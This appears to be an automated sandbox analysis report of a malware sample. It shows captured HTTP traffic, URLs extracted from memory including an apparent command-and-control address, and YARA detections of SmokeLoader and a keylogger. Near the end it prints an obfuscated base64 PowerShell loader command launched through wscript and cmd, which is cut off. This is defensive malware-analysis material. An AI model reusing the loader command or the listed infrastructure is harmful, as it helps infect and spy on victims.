b0 a4 c4 ac 46 a5 82 05 94 ed 41 c3 8f b1 24 41 7c d7 6a f2 95 5d 56 11 9e 61 8c bc d4 cd 02 09 de 44 b5 59 38 d8 25 d2 3d 50 18 2c c1 38 17 c3 6e 4b 02 bc 52 6d 24 35 f5 4f 48 4d ac 43 20 e7 49 e8 41 0b 57 ab 3c 4e e6 cf a7 29 6d 73 02 64 86 b5 bd 34 f3 74 17 40 3b 9c c6 a0 40 f9 cb 82 19 6c a2 b9 11 0f c5 5c 68 97 ab 69 2e 8f 82 8e 9b c7 75 77 c4 7d 27 dd 77 d4 e3 bc b0 c5 c8 c3 d2 59 29 d2 3c 79 89 80 b3 9b cd 5e 26 40 df d6 59 ed 5c c9 8b 7d 1f bd 35 dd 5c d0 32 fe 5d 3b 37 f0 89 3f eb 0c c0 73 fd a0 7c bc 94 79 f9 e8 6e eb a5 ba bf fe aa 2e 47 1f 85 f9 b7 92 e3 08 3d ee fa 49 ef d4 ad 12 6a 19 f9 37 34 59 94 14 eb b5 34 26 e4 70 ea 54 d7 c0 86 cd b3 b6 1c 6b c8 16 e6 07 0e d5 b1 ec b1 62 a2 c4 be c9 43 79 b1 cb 41 be b4 71 a5 26 dd 56 9f 5c 45 fa 6f d2 51 86 3a d2 1b be dd 7c 8b e0 3f 8d b4 5f fd 21 87 ff cb 91 cb e7 ea db 21 55 85 9d 4f 33 8a a7 b7 94 28 9a 9a b7 41 f7 a8 0c dc 5e 5c fd 9a 78 75 87 d0 da 0a b7 1f 43 5a 04 fd db 4b 34 c7 28 e6 37 62 d2 20 15 de 0b 3e d1 f3 e9 55 32 7b 1f 2e cc 8b 0e 5e c5 2f 72 c0 7c bb 4b 47 c2 b1 9f 22 ca f2 54 22 00 66 53 68 a0 ed 4e 0e 3b 40 30 16 2a 61 7c 73 e6 a2 99 89 5e 38 b8 f6 b5 91 a4 84 fb d4 d5 1c e8 f3 0b 49 66 6c b5 47 ae 4e ec 72 8b ab d6 f2 3e 6c 5c cc 19 3f 95 23 d2 c5 c0 b0 00 1d 9a 04 83 0d c3 c9 f9 ba b1 d4 f6 7e 47 a6 b8 e8 54 2b 2e ef 7e 3d c1 59 56 77 44 f9 14 2c 1c b4 1d 53 44 17 f3 f4 42 f4 72 c7 41 b8 3d 25 62 51 3d c6 d6 67 56 49 b2 ec aa e0 aa 52 fb d2 dc 6b c4 5f e8 be bd 06 45 6d cc d1 c8 c3 4a 74 9c be 6a 14 a3 e6 cc 86 92 c0 73 43 5b 13 f9 df 22 2b 5b fe 63 02 e4 92 9c 2e 75 68 f4 85 20 27 41 4d 9e 71 67 f0 f1 5a c2 6f a2 a3 d2 f7 70 ac df 50 8d df 56 42 24 58 4d 32 d7 8b 00 cb 90 9e 40 c5 84 ac a4 f2 62 b5
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 10 Apr 2024 08:24:08 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 401Keep-Alive: timeout=5, max=98Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 74 69 6c 6c 61 70 72 6f 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at atillapro.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 10 Apr 2024 08:24:08 GMTServer: Apache/2.4.41 (Ubuntu)Keep-Alive: timeout=5, max=97Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 36 64 32 30 32 0d 0a 00 00 13 75 b6 2b 14 9a 80 f5 36 87 98 e3 5c 9c b0 61 a9 af ce 0b d1 b1 0c a2 6d f1 be 21 e8 69 ff e9 bd b1 49 f8 d2 b8 16 35 69 4d e1 9d 13 21 49 f5 23 36 cd 40 6a 31 0f 52 d1 5e 15 92 86 01 83 05 3d 22 64 5c 66 56 03 ee 3b 87 6c 41 c5 ee ce 0c ce 5d 45 52 7f cf e0 8c 8f 12 16 08 18 a2 53 47 7a 7f 8c f5 d8 69 ac 22 7a 2d 4b ec 56 19 bc 4f 14 02 aa 7f 51 c5 bf f7 8b 70 79 98 38 1f f4 79 66 cf dc f6 72 fd e5 eb ff 22 4c 16 8b 87 39 4a 33 6d 63 a8 7b c5 6d 1d 22 96 e9 64 fb a9 d2 96 5a 88 ff e9 8e 9d 40 57 49 98 c8 3a 20 2f 06 0f 9f 1c d1 8b fc e7 31 ff d7 26 cd b0 9e 53 87 dc 4e 6f ea d0 f8 22 f3 a0 7e 5b e6 d1 27 8b c8 d7 eb 7d 6c ff d1 53 9c 27 26 4c a5 b4 8a c6 64 cf a0 45 20 31 be 8e 16 23 0d d2 e7 9f 9f 74 f4 6f 12 56 53 37 bd 7b ab fa da 1c 38 89 b4 7f e3 7e bd 97 ae f5 23 35 f5 8e 07 d1 d8 b0 a8 83 a9 f3 93 42 6b b2 cc b1 b3 79 07 27 3b 79 03 98 66 ae d0 99 4c a2 88 e3 c3 8a 6a ef 3a 68 09 2b c4 4c 2e 95 c7 dc c6 5d 3c 3d 68 e6 9b d8 9d 57 9b 8d 9a bd 11 8b 8b 57 b5 24 82 77 d8 95 6c 32 7a d7 2e ac 48 09 0e 8a b4 e0 54 76 03 b0 a4 d0 ac 46 a5 82 15 94 ef 51 83 0e b1 24 51 7c c7 7a f2 95 5d 56 01 9e 61 9c bc d4 31 70 01 de f4 b5 59 38 d8 b5 da 3d 50 1c 2c c1 54 5c c5 6e ff 02 bc 52 6d 94 33 f5 af 49 4d ac 43 80 ef 49 78 43 0b 57 ab 3c 4e e6 cf a7 29 6d 73 c2 62 86 bd f2 34 f3 54 c2 45 3b a4 c6 a0 40 f9 cb 82 19 6c a2 b9 11 0f c5 5c 68 97 ab 69 2e 73 57 8b 9b df 75 77 c4 25 82 db 77 a8 e1 bc b0 c5 c8 c3 d2 59 29 d2 3c 79 c9 85 b3 93 ce 5e 26 40 df d6 59 ed 5c c9 8b 53 6b d8 4d a9 5c d0 32 12 05 39 37 f0 99 3f eb 22 ee 14 85 d4 78 bc 94 b3 d1 ed 6e eb b5 ba bf fe 80 2b 47 3f 81 f9 d7 bc 97 6d 45 9a 98 3a 9c d4 ad 13 6a 39 89 35 54 77 e6 70 8a c1 55 26 e4 8e f6 55 d7 c0 c6 c8 b3 b6 02 6a c8 96 c8 02 ee fb c3 88 d0 16 c3 c4 be 81 4e 7c b1 8b 31 bd f4 5f cf 42 a9 37 c1 5e 45 0e 29 d2 51 86 5a d4 1b be e9 7c 8b a0 73 8b f4 71 99 40 f3 9e cb 91 cb a3 ea db 21 15 05 95 8f 1d fa d4 c5 f7 44 9d 9a 57 40 f7 a8 0c 6c 58 5c fd 98 78 75 c7 50 dc ca 99 6d 30 28 67 fd db 4b 34 c3 28 e6 77 f2 da 60 3b a8 6e 52 be fe ee 55 3a 34 1f 2e cc 4b 08 5e c5 7f 72 c0 3c 39 4d 07 ec c3 fa 4e a5 91 54 22 dc 6e 53 68 e0 4d 46 4c 3b 4a 30 16 2a 13 7b 73 e6 a2 99 89 5e 38 b8 f6 b5 91 a4 84 bb d4 d5 5e e8 f3 0b 49 66 6c b5 47 ae 4e ec 72 8b ab d6 f2 3e 6c 5c cc 19 3f 95 23 d2 c5 c0 b0 00 1d 9a 04 83 0d c3 c9 f9 ba b1 d4 f6 7e 47 a6 b8 e8 54 2b 2e ef 7e 3d c1 59 56 77 44 f9 14 2c 1c b4 1d 53 44 17 f3 f4 42 f4 72 c7 41 b8 3d 25 62 51 3d c6 d6 67 56 49 b2 ec aa e0 aa 52 fb d2 dc 6b c4 5f e8 be bd 06 45 6d cc d1 c8 c3 4a 74 9c be 6a 14 a3 e6 cc 86 92 c0 73 43 5b 13 f9 df 22 2b 5b fe 63 02 e4 92 9c 2e 75 68 f4 85 20 27 41 4d 9e 71 67 f0 f1 5a c2 6f a2 a3 d2 f7 70 ac df 50 8d df 56 42 24 58 4d 32 d7 8b 00 cb 90 9e 40 c5 84 ac a4 f2 62 b5
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 10 Apr 2024 08:24:09 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 401Keep-Alive: timeout=5, max=96Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 74 69 6c 6c 61 70 72 6f 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at atillapro.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 10 Apr 2024 08:24:11 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 275Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 74 69 6c 6c 61 70 72 6f 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at atillapro.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 10 Apr 2024 08:24:11 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 275Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 74 69 6c 6c 61 70 72 6f 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at atillapro.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 10 Apr 2024 08:24:16 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 401Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 74 69 6c 6c 61 70 72 6f 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at atillapro.com Port 80</address></body></html>
Source: powershell.exe, 00000005.00000002.2032888625.0000000006D50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: xwREqjHUEv.exe, 00000000.00000000.1996748280.000000000040A000.00000008.00000001.01000000.00000003.sdmp, xwREqjHUEv.exe, 00000000.00000002.2013767501.000000000040A000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000005.00000002.2031709829.0000000005857000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2117709095.0000000005CB7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.2114566601.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.2029024330.00000000047F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2114566601.0000000004C51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.2114566601.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.2033375932.0000000006E17000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.coK
Source: dialer.exe, 00000008.00000002.2178871249.000000000327C000.00000004.00000010.00020000.00000000.sdmp, OpenWith.exe String found in binary or memory: https://216.250.255.115:80/bed1f869ae125/aqbrhghr.uhmsf
Source: powershell.exe, 00000005.00000002.2029024330.00000000047F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2114566601.0000000004C51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000006.00000002.2117709095.0000000005CB7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.2117709095.0000000005CB7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.2117709095.0000000005CB7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.2114566601.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.2029024330.0000000005051000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000005.00000002.2031709829.0000000005857000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2117709095.0000000005CB7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected SmokeLoader
Source: Yara match File source: 22.2.gfiecjd.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.AppLaunch.exe.1ff003ad060.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.D4C0.vmt.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.gfiecjd.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.AppLaunch.exe.1ff003bd080.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.D4C0.vmt.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.AppLaunch.exe.1ff003b4af0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000016.00000002.2788977995.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2538928588.0000000000521000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2538295136.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2790746450.0000000001EB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\gfiecjd, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe, type: DROPPED
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_0040571B
Yara detected Keylogger Generic
Source: Yara match File source: 8.3.dialer.exe.58a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.dialer.exe.5340000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.dialer.exe.5680000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.F324.exe.3b00000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.dialer.exe.5120000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.F324.exe.3d20000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.dialer.exe.5340000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000003.2791924717.0000000003B00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2107655935.0000000005680000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2824488495.0000000005120000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2825213965.0000000005340000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2107848027.00000000058A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000016.00000002.2788977995.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000013.00000002.2538928588.0000000000521000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000013.00000002.2538295136.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000016.00000002.2790746450.0000000001EB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: Process Memory Space: powershell.exe PID: 2964, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5720, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Very long command line found
Source: C:\Windows\SysWOW64\cmd.exe Process created: Commandline size = 2883
Source: C:\Windows\SysWOW64\cmd.exe Process created: Commandline size = 2883 Jump to behavior
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiR